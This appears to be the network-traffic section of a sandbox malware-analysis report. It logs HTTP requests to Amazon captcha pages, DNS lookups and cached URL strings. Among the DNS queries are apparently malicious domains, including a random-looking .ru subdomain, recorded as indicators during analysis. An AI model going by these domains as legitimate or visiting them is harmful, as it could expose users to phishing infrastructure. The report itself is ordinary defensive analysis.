Source: global trafficHTTP traffic detected: GET /images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/amazonui/sprites/aui_sprite_0007-1x._V383827579_.png HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1._V313498596_.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-session-snapshot-keypress.min._V2_.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /images/G/01/AUIClients/ClientSideMetricsAUIJavascript-51171fbdd28e1a7a61e922e8f0272af8bc74d37b.secure.variant-desktop-session-snapshot-keypress.min._V2_.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /captcha/bcxmjlko/Captcha_yeyjbrcolt.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/bcxmjlko/Captcha_yeyjbrcolt.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/validateCaptcha?amzn=V%2FQWGh%2Bxq8nH6gH01OjA4w%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.amazon.com/errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/wxvwzfzh/Captcha_gofzzllses.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/wxvwzfzh/Captcha_gofzzllses.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/validateCaptcha?amzn=tsPwu3l9tzgnem5k5fj8Zw%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.amazon.com/errors/validateCaptcha?amzn=V%2FQWGh%2Bxq8nH6gH01OjA4w%3D%3D&amzn-r=%2F&field-keywords=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/rhnrlggh/Captcha_fcrspsdsms.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/rhnrlggh/Captcha_fcrspsdsms.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/validateCaptcha?amzn=UOEyeih%2FO2Ng4k18wziu%2Bg%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.amazon.com/errors/validateCaptcha?amzn=tsPwu3l9tzgnem5k5fj8Zw%3D%3D&amzn-r=%2F&field-keywords=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/fmvtfjch/Captcha_pslxfojrtx.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/fmvtfjch/Captcha_pslxfojrtx.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /errors/validateCaptcha?amzn=aWtjLQPQePOkOjbZRBDfnw%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.amazon.com/errors/validateCaptcha?amzn=UOEyeih%2FO2Ng4k18wziu%2Bg%3D%3D&amzn-r=%2F&field-keywords=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: csm-sid=837-4096594-8717172
Source: global trafficHTTP traffic detected: GET /captcha/uyvnnjxx/Captcha_lfxcionvuw.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/uyvnnjxx/Captcha_lfxcionvuw.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.google.pn
Source: global trafficDNS traffic detected: DNS query: deshshippinglines.com
Source: global trafficDNS traffic detected: DNS query: y3.ackeoneye.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ru
Source: global trafficDNS traffic detected: DNS query: www.amazon.com
Source: global trafficDNS traffic detected: DNS query: images-na.ssl-images-amazon.com
Source: global trafficDNS traffic detected: DNS query: fls-na.amazon.com
Source: unknownHTTP traffic detected: POST /report/v4?s=%2F6ROHfEAEbc7x2dx%2BM4cZ7exDP81u%2Fj9itd0a6%2FlwJi0JyF1ZCOaeigw7ngWXDI4TdWYPFVGNjq1YGj0Wuw%2BlPX7TbIzxXnibU207UDQ7VpFUj2wLIGCNPAqU7%2FluwfYNodH4w%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 427Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Jan 2025 14:44:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Jan 2025 14:44:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6ROHfEAEbc7x2dx%2BM4cZ7exDP81u%2Fj9itd0a6%2FlwJi0JyF1ZCOaeigw7ngWXDI4TdWYPFVGNjq1YGj0Wuw%2BlPX7TbIzxXnibU207UDQ7VpFUj2wLIGCNPAqU7%2FluwfYNodH4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=801&min_rtt=793&rtt_var=238&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1148&delivery_rate=4848920&cwnd=252&unsent_bytes=0&cid=57e550caeea798d9&ts=404&x=0"CF-Cache-Status: HITAge: 2485Server: cloudflareCF-RAY: 90898617cd2e8ca8-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2357&min_rtt=2314&rtt_var=955&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1894&delivery_rate=1096507&cwnd=164&unsent_bytes=0&cid=c4b22d9dd97ae036&ts=2660&x=0"
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://affiliate-program.amazon.com/gp/advertising/api/detail/main.html/ref=rm_c_ac
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://developer.amazonservices.com/ref=rm_c_sv
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://fls-na.amaz
Source: chromecache_125.2.drString found in binary or memory: https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=84WJXV7DNH36VC70R49D&js=0
Source: chromecache_115.2.drString found in binary or memory: https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=0
Source: chromecache_130.2.drString found in binary or memory: https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=0
Source: chromecache_109.2.drString found in binary or memory: https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=JV24GEVQ6WQTM84SCTM8&js=0
Source: chromecache_133.2.drString found in binary or memory: https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=0
Source: chromecache_114.2.drString found in binary or memory: https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=0
Source: chromecache_133.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/captcha/bcxmjlko/Captcha_yeyjbrcolt.jpg
Source: chromecache_130.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/captcha/docvmtpr/Captcha_zqhwgudfzb.jpg
Source: chromecache_114.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/captcha/fmvtfjch/Captcha_pslxfojrtx.jpg
Source: chromecache_109.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/captcha/rhnrlggh/Captcha_fcrspsdsms.jpg
Source: chromecache_125.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/captcha/uyvnnjxx/Captcha_lfxcionvuw.jpg
Source: chromecache_115.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/captcha/wxvwzfzh/Captcha_gofzzllses.jpg
Source: chromecache_98.2.dr, chromecache_116.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/
Source: chromecache_98.2.dr, chromecache_116.2.drString found in binary or memory: https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://www.amazon.com/gp/help/customer/display.html/ref=footer_cou?ie=UTF8&nodeId=508088
Source: chromecache_109.2.dr, chromecache_125.2.dr, chromecache_130.2.dr, chromecache_133.2.dr, chromecache_115.2.dr, chromecache_114.2.drString found in binary or memory: https://www.amazon.com/gp/help/customer/display.html/ref=footer_privacy?ie=UTF8&nodeId=468496
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
